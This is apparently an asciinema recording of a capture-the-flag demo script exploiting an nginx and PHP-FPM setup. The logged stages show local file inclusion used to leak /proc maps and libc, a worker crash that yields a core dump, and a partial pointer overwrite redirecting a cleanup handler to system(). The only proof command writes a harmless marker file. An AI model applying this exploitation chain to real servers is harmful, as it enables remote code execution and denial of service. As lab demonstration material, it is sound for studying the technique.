{"version":3,"term":{"cols":210,"rows":54,"type":"xterm-256color","version":"iTerm2 3.6.10","theme":{"fg":"#c7c7c7","bg":"#000000","palette":"#000000:#b93019:#52c037:#c7c53e:#0c24c0:#ba3ec1:#53c3c6:#c7c7c7:#686868:#f0776d:#8df77a:#fffc7f:#6a71f7:#f17ff9:#8efafe:#ffffff"}},"timestamp":1778801578,"env":{"SHELL":"/bin/zsh"}}
[0.105, "o", "\u001b]1337;RemoteHost=user@workstation\u0007\u001b]1337;CurrentDir=/path/to/Nginx-Rift\u0007"]
[0.000, "o", "\u001b]1337;ShellIntegrationVersion=19;shell=fish\u0007"]
[0.002, "o", "\u001b[?u\u001b[>0q\u001b]11;?\u001b\\\u001b[?1049h\u001bP+q696e646e\u001b\\\u001bP+q71756572792d6f732d6e616d65\u001b\\\u001b[?1049l\u001b[0c"]
[0.056, "o", "\r"]
[0.000, "o", "\u001b[38;2;102;102;102m"]
[0.004, "o", "Darwin workstation.local 25.5.0 arm64\r\n"]
[0.002, "o", " 1:32  up 1 day, 13:02, 15 users, load averages: 4.61 4.58 4.68\r\n"]
[0.001, "o", "\u001b[m"]
[0.012, "o", "\u001b[6 q"]
[0.000, "o", "\u001b]7;file://workstation.local/path/to/Nginx-Rift\u0007"]
[0.093, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u001b\\\u001b]133;D;0\u0007\u001b]1337;RemoteHost=user@workstation\u0007\u001b]1337;CurrentDir=/path/to/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[48C"]
[2.339, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.001, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "python ./demo_ctf_exploit.py  --host <target-host> --port 19321 --clear\r\u001b[119C"]
[0.000, "o", "\u001b[71D\u001b[39mpython\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo_ctf_exploit.py\u001b[38;2;178;178;178;24m  \u001b[38;2;204;204;255m--host\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m<target-host>\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--port\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m19321\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--clear\u001b[38;2;178;178;178m\r\u001b[119C"]
[0.003, "o", "\r\u001b[119C"]
[3.532, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\r\u001b[119C\r\n\u001b["]
[0.000, "o", "m\u001b]133;C;cmdline_url=python%20./demo_ctf_exploit.py%20%20--host%20<target-host>%20--port%2019321%20--clear\u0007"]
[0.000, "o", "\u001b]133;C;\r\u0007"]
[0.000, "o", "\u001b[2 q"]
[0.001, "o", "\u001b]0;python ~/D/t/n/Nginx-Rift\u0007\u001b[m\r"]
[0.152, "o", "\u001b[2J\u001b[H\r\n\u001b[1m\u001b[36mNginx Rift CTF Demo Runner\u001b[0m\u001b[0m\r\n\u001b[2m============================================================================\u001b[0m\r\nTarget: \u001b[1m<target-host>:19321\u001b[0m\r\nMode:   same-port PHP LFI + HTTP/2 victim + core-guided partial overwrite\r\nProof:  marker file verified through the LFI endpoint\r\n\u001b[2m============================================================================\u001b[0m\r\n\r\n"]
[0.366, "o", "\r\n\u001b[1m\u001b[34m[01] Lab preflight\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.181, "o", "\u001b[2m+000.5s\u001b[0m \u001b[36m[*]\u001b[0m Checking that nginx answers normal HTTP/1.1 traffic\r\n"]
[0.191, "o", "\u001b[2m+000.7s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/1.1 listener is alive\r\n"]
[0.184, "o", "\u001b[2m+000.9s\u001b[0m \u001b[36m[*]\u001b[0m Fetching /phpinfo.php as a realistic deployment hint\r\n"]
[0.199, "o", "\u001b[2m+001.1s\u001b[0m \u001b[32m[+]\u001b[0m phpinfo is reachable; Server API hint: php-fpm\r\n"]
[0.185, "o", "\u001b[2m+001.3s\u001b[0m \u001b[36m[*]\u001b[0m Sending an HTTP/2 client preface to confirm same-port h2 support\r\n"]
[0.188, "o", "\u001b[2m+001.5s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/2 responded with 49 bytes of SETTINGS/WINDOW_UPDATE data\r\n"]
[0.184, "o", "\r\n\u001b[1m\u001b[34m[02] Remote ASLR discovery through PHP LFI\u001b[0m\u001b[0m\r\n"]
[0.000, "o", "\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.180, "o", "\u001b[2m+001.9s\u001b[0m \u001b[36m[*]\u001b[0m Reading PHP-FPM /proc/self/status through the LFI endpoint\r\n"]
[0.189, "o", "\u001b[2m+002.0s\u001b[0m \u001b[32m[+]\u001b[0m PHP-FPM UID is 65534\r\n"]
[0.184, "o", "\u001b[2m+002.2s\u001b[0m \u001b[36m[*]\u001b[0m Reading nginx pid file and worker children through LFI\r\n"]
[0.194, "o", "    \u001b[2mnginx master PID:\u001b[0m  \u001b[33m15553\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mnginx worker PID:\u001b[0m  \u001b[33m15645\u001b[0m\r\n"]
[0.075, "o", "    \u001b[2mworker UID:\u001b[0m        65534\r\n"]
[0.075, "o", "\u001b[2m+002.7s\u001b[0m \u001b[36m[*]\u001b[0m Parsing /proc/<worker>/maps for PIE, heap, and libc mappings\r\n"]
[0.185, "o", "    \u001b[2mnginx writable map:\u001b[0m \u001b[35m0x561281df2000 (/nginx-src/build/nginx)\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mworker heap ranges:\u001b[0m 0x561282432000-0x561282497000, 0x561282497000-0x5612824c0000\r\n"]
[0.078, "o", "    \u001b[2mlibc mapping:\u001b[0m      \u001b[35m0x7f576434f000 (/usr/lib/x86_64-linux-gnu/libc.so.6)\u001b[0m\r\n"]
[0.077, "o", "\u001b[2m+003.1s\u001b[0m \u001b[36m[*]\u001b[0m Downloading mapped libc through LFI and parsing the ELF dynamic symbol table\r\n"]
[0.197, "o", "    \u001b[2msystem() offset:\u001b[0m   \u001b[32m0x50d70\u001b[0m\r\n"]
[0.073, "o", "    \u001b[2msystem() address:\u001b[0m  \u001b[32m0x7f576439fd70\u001b[0m\r\n"]
[0.077, "o", "\u001b[2m+003.4s\u001b[0m \u001b[36m[*]\u001b[0m Checking legacy low-byte URI-safe candidates for comparison\r\n"]
[0.181, "o", "    \u001b[2mlegacy safe candidates:\u001b[0m 3 / 20 (15.0%)\r\n"]
[0.076, "o", "\r\n\u001b[1m\u001b[34m[03] Proof command and overwrite model\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.185, "o", "\u001b[2m+003.9s\u001b[0m \u001b[36m[*]\u001b[0m The final proof is a marker file created by system(), then read back over LFI\r\n"]
[0.184, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_755d7d5cf318\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mmarker token:\u001b[0m      \u001b[33m1d54cab9c45ff6e7868f48da8728f452\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mproof command:\u001b[0m     \u001b[32mprintf 1d54cab9c45ff6e7868f48da8728f452 > /tmp/nginx_rift_demo_755d7d5cf318\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mpartial overwrite:\u001b[0m 2 low byte(s)\r\n"]
[0.077, "o", "    \u001b[2mprobe target bytes:\u001b[0m 3030\r\n"]
[0.077, "o", "    \u001b[2mrequest geometry:\u001b[0m  A=127, plus=962, HTTP/2 victim\r\n"]
[0.075, "o", "\r\n\u001b[1m\u001b[34m[04] Probe crash and core generation\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.182, "o", "\u001b[2m+004.7s\u001b[0m \u001b[36m[*]\u001b[0m Building a 4000-byte slot-probe body with nonce markers at many aligned offsets\r\n"]
[0.185, "o", "    \u001b[2mslot nonce:\u001b[0m        \u001b[35me0f62d6d21dc\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mslot stride:\u001b[0m       8\r\n"]
[0.075, "o", "\u001b[2m+005.0s\u001b[0m \u001b[36m[*]\u001b[0m Opening spray requests, an HTTP/2 victim connection, and the vulnerable /api request\r\n"]
[0.184, "o", "\u001b[2m+005.2s\u001b[0m \u001b[36m[*]\u001b[0m Expected result: one worker crash and a readable /app/tmp/core\r\n"]
[0.994, "o", "\u001b[2m+006.2s\u001b[0m \u001b[32m[+]\u001b[0m probe caused worker disruption as expected\r\n"]
[0.185, "o", "\u001b[2m+006.4s\u001b[0m \u001b[36m[*]\u001b[0m Waiting 2.0s for nginx master respawn and core write\r\n"]
[2.185, "o", "\r\n\u001b[1m\u001b[34m[05] Core parsing through LFI\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.185, "o", "\u001b[2m+008.8s\u001b[0m \u001b[36m[*]\u001b[0m Reading ELF core metadata from /app/tmp/core through LFI\r\n"]
[0.189, "o", "\u001b[2m+008.9s\u001b[0m \u001b[32m[+]\u001b[0m core parsed: 40 load segments, 19 writable\r\n"]
[0.185, "o", "    \u001b[1mvaddr         \u001b[0m  \u001b[1mfilesz \u001b[0m  \u001b[1mflags\u001b[0m\r\n    \u001b[2m--------------  -------  -----\u001b[0m\r\n    0x561281df2000  0x16000  0x6  \r\n    0x561281e08000  0x22000  0x6  \r\n    0x561282432000  0x65000  0x6  \r\n    0x561282497000  0x82000  0x6  \r\n"]
[0.000, "o", "    0x7f5764281000  0x7c000  0x6  \r\n"]
[0.183, "o", "\u001b[2m+009.3s\u001b[0m \u001b[36m[*]\u001b[0m Scanning writable core segments for slot-probe nonce markers\r\n"]
[0.225, "o", "\u001b[2m+009.5s\u001b[0m \u001b[32m[+]\u001b[0m slot scan found 896 URI-safe candidates out of 10437\r\n"]
[0.184, "o", "    \u001b[1msafe addr     \u001b[0m  \u001b[1mbody offset\u001b[0m\r\n    \u001b[2m--------------  -----------\u001b[0m\r\n"]
[0.000, "o", "    0x561282452727  512        \r\n    0x56128245272f  520        \r\n"]
[0.000, "o", "    0x561282452737  528        \r\n    0x561282452747  544        \r\n    0x56128245274f  552        \r\n"]
[0.000, "o", "    0x561282452757  560        \r\n"]
[0.001, "o", "    0x56128245275f  568        \r\n    0x561282452767  576        \r\n"]
[0.180, "o", "\u001b[2m+009.9s\u001b[0m \u001b[36m[*]\u001b[0m Finding the corrupted HTTP/2 connection pool and preserved high bytes\r\n"]
[0.429, "o", "    \u001b[2mnormal cleanup pools:\u001b[0m 12\r\n"]
[0.077, "o", "    \u001b[2mprobe/corrupted pools:\u001b[0m \u001b[33m1\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mmatching safe slots:\u001b[0m \u001b[32m45\u001b[0m\r\n"]
[0.077, "o", "    \u001b[1mpool          \u001b[0m  \u001b[1mcleanup       \u001b[0m  \u001b[1mpreserved window\u001b[0m\r\n    \u001b[2m--------------  --------------  ----------------\u001b[0m\r\n    0x5612824f7190  0x5612824f3030  0x5612824f0000  \r\n"]
[0.185, "o", "    \u001b[1mcandidate     \u001b[0m  \u001b[1moffset\u001b[0m  \u001b[1mmatched pool  \u001b[0m\r\n    \u001b[2m--------------  ------  --------------\u001b[0m\r\n    0x5612824f777a  0       0x5612824f7190\r\n    0x5612824f782a  176     0x5612824f7190\r\n    0x5612824f7832  184     0x5612824f7190\r\n    0x5612824f783a  192     0x5612824f7190\r\n    0x5612824f7842  200     0x5612824f7190\r\n    0x5612824f784a  208     0x5612824f7190\r\n    0x5612824f7852  216     0x5612824f7190\r\n"]
[0.000, "o", "    0x5612824f785a  224     0x5612824f7190\r\n"]
[0.185, "o", "\r\n\u001b[1m\u001b[34m[06] Worker reset and final address derivation\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.185, "o", "\u001b[2m+011.1s\u001b[0m \u001b[36m[*]\u001b[0m Crashing once more after core extraction to restore a cleaner worker state\r\n"]
[2.997, "o", "\u001b[2m+014.1s\u001b[0m \u001b[32m[+]\u001b[0m nginx worker recovered\r\n"]
[0.185, "o", "\u001b[2m+014.3s\u001b[0m \u001b[36m[*]\u001b[0m Replaying HTTP-only ASLR derivation on the fresh worker\r\n"]
[0.185, "o", "\u001b[2m+014.5s\u001b[0m \u001b[36m[*]\u001b[0m Reading PHP-FPM /proc/self/status through the LFI endpoint\r\n"]
[0.188, "o", "\u001b[2m+014.7s\u001b[0m \u001b[32m[+]\u001b[0m PHP-FPM UID is 65534\r\n"]
[0.185, "o", "\u001b[2m+014.9s\u001b[0m \u001b[36m[*]\u001b[0m Reading nginx pid file and worker children through LFI\r\n"]
[0.198, "o", "    \u001b[2mnginx master PID:\u001b[0m  \u001b[33m15553\u001b[0m\r\n"]
[0.074, "o", "    \u001b[2mnginx worker PID:\u001b[0m  \u001b[33m15655\u001b[0m\r\n"]
[0.075, "o", "    \u001b[2mworker UID:\u001b[0m        65534\r\n"]
[0.077, "o", "\u001b[2m+015.3s\u001b[0m \u001b[36m[*]\u001b[0m Parsing /proc/<worker>/maps for PIE, heap, and libc mappings\r\n"]
[0.185, "o", "    \u001b[2mnginx writable map:\u001b[0m \u001b[35m0x561281df2000 (/nginx-src/build/nginx)\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mworker heap ranges:\u001b[0m 0x561282432000-0x561282497000, 0x561282497000-0x5612824c0000\r\n"]
[0.074, "o", "    \u001b[2mlibc mapping:\u001b[0m      \u001b[35m0x7f576434f000 (/usr/lib/x86_64-linux-gnu/libc.so.6)\u001b[0m\r\n"]
[0.077, "o", "\u001b[2m+015.7s\u001b[0m \u001b[36m[*]\u001b[0m Downloading mapped libc through LFI and parsing the ELF dynamic symbol table\r\n"]
[0.190, "o", "    \u001b[2msystem() offset:\u001b[0m   \u001b[32m0x50d70\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2msystem() address:\u001b[0m  \u001b[32m0x7f576439fd70\u001b[0m\r\n"]
[0.077, "o", "\u001b[2m+016.0s\u001b[0m \u001b[36m[*]\u001b[0m Checking legacy low-byte URI-safe candidates for comparison\r\n"]
[0.185, "o", "    \u001b[2mlegacy safe candidates:\u001b[0m 3 / 20 (15.0%)\r\n"]
[0.077, "o", "\r\n\u001b[1m\u001b[34m[07] Final exploit attempt\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.182, "o", "\u001b[2m+016.5s\u001b[0m \u001b[36m[*]\u001b[0m candidate 1/45: fake cleanup at 0x5612824f777a, body offset 0\r\n"]
[0.180, "o", "    \u001b[2moverwrite bytes:\u001b[0m   7a77\r\n"]
[0.076, "o", "    \u001b[2mfake handler:\u001b[0m      \u001b[32msystem@0x7f576439fd70\u001b[0m\r\n"]
[0.072, "o", "    \u001b[2mfake data:\u001b[0m         0x5612824f7792\r\n"]
[0.073, "o", "\u001b[2m+016.9s\u001b[0m \u001b[36m[*]\u001b[0m sending final attempt 1/1\r\n"]
[1.352, "o", "\r\n\u001b[1m\u001b[34m[08] Result\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.185, "o", "\u001b[2m+018.4s\u001b[0m \u001b[32m[+]\u001b[0m CTF WIN: marker token was read back through LFI\r\n"]
[0.185, "o", "    \u001b[2mwinning address:\u001b[0m   \u001b[32m0x5612824f777a\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mwinning body offset:\u001b[0m \u001b[32m0\u001b[0m\r\n"]
[0.072, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_755d7d5cf318\u001b[0m\r\n"]
[0.077, "o", "    \u001b[2mmarker token:\u001b[0m      \u001b[33m1d54cab9c45ff6e7868f48da8728f452\u001b[0m\r\n"]
[0.077, "o", "\u001b[2m+018.9s\u001b[0m \u001b[36m[*]\u001b[0m worker disruption was expected; nginx master respawned the worker\r\n"]
[0.201, "o", "\u001b]133;D;0\u0007"]
[0.001, "o", "\u001b[6 q"]
[0.000, "o", "\u001b[?25h"]
[0.000, "o", "\u001b[2m⏎\u001b[m                                                                                                                                                                                                                 \r⏎ \r\u001b[K"]
[0.000, "o", "\u001b]7;file://workstation.local/path/to/Nginx-Rift\u0007"]
[0.103, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u0007\u001b]133;D;0\u0007\u001b]1337;RemoteHost=user@workstation\u0007\u001b]1337;CurrentDir=/path/to/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[205C\u001b[38;2;102;102;102m19.3s\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[205C\r\u001b[48C"]
[7.639, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u\r\n"]
[0.000, "o", "\u001b[m\u001b[m"]
[0.000, "o", "\u001b[2 q"]
[0.000, "x", "0"]
